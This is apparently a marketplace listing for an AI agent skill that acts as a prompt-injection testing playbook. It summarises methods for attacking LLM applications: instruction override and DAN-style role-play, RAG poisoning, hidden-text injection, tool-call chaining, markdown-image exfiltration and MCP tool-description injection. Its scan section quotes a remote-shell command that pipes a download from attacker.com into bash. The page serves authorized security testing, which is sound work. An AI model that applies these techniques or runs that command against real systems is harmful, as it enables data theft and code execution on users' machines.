Back to Skills

llm-prompt-injection

LLM prompt injection playbook. Use when testing AI/LLM applications for direct injection, indirect injection via RAG/browsing, tool abuse, data exfiltration, MCP security risks, and defense bypass techniques.

1,292stars177forksUpdated 7/6/2026

Security Assessment

High Risk(45/100)

Detected risks:

Remote Code Execution([SKILL.md] curl attacker.com/shell.sh | bash)
Sensitive File Access([SKILL.md] /etc/passwd)
Command Injection([SKILL.md] os.system)
Security Score45/100

About llm-prompt-injection

A security-testing playbook for probing AI/LLM applications against prompt injection. It separates direct injection — user input that overrides or subverts system instructions through techniques like instruction override, role reassignment, priority escalation, completion hijacking, XML-tag prompt termination, context manipulation, and role-play framings such as DAN — from indirect injection, where malicious instructions arrive through a data channel the model processes rather than being typed by the user.

Indirect vectors include RAG poisoning (submitting poisoned documents that get indexed and retrieved), web-browsing injection using off-screen or zero-width hidden text that a human reader never sees, and email or message injection with hidden white-text instructions. It then covers tool and function-calling abuse: direct tool invocation to read sensitive files or make outbound requests, argument injection (for example smuggling SQL into a tool's query parameter), and chaining individually innocuous tool calls (read, then summarize, then POST) to achieve data exfiltration.

Dedicated sections address data exfiltration through markdown image injection (a rendered image URL that leaks data in its query string), link injection, and encoding context into tool-call arguments, as well as Model Context Protocol risks — untrusted MCP servers performing tool-description injection, malicious default parameters, response injection, schema manipulation, and cross-MCP data leakage. It routes to related skills (ai-ml-security, xss-cross-site-scripting, ssrf-server-side-request-forgery) and a JAILBREAK_PATTERNS.md catalog of jailbreak techniques, and is intended for authorized testing of LLM applications, described factually as a security-assessment resource.

FAQ

What is the difference between direct and indirect prompt injection?

Direct injection is malicious instructions the user types to override system instructions; indirect injection arrives through a data channel the LLM processes, such as RAG documents, web pages, or emails, without the user typing it.

How can tool or function calling be abused?

Through direct tool invocation (for example reading sensitive files), argument injection such as smuggling SQL into a tool's query parameter, and chaining individually innocuous tool calls to read and then exfiltrate data.

What MCP-specific risks does it cover?

Untrusted MCP servers performing tool-description injection, malicious default parameters, response injection, schema manipulation, and cross-MCP data leakage between trusted and untrusted servers.

How is data exfiltrated from an LLM response?

Via markdown image injection (a rendered image URL that leaks data in its query string), link injection, or encoding conversation context into tool-call arguments sent to an external system.

What indirect injection channels are described?

RAG and knowledge-base poisoning, web-browsing injection using off-screen or zero-width hidden text, and email or message injection with hidden white-text or zero-width instructions.

All Files

2 files
SKILL.md12.4 KB
View
JAILBREAK_PATTERNS.md9.6 KB
View

Install llm-prompt-injection

Download and extract the skill files to your .claude/skills/ directory.

Quick Setup:

  1. Copy the skill folder to .claude/skills/
  2. Claude will automatically detect and use the skill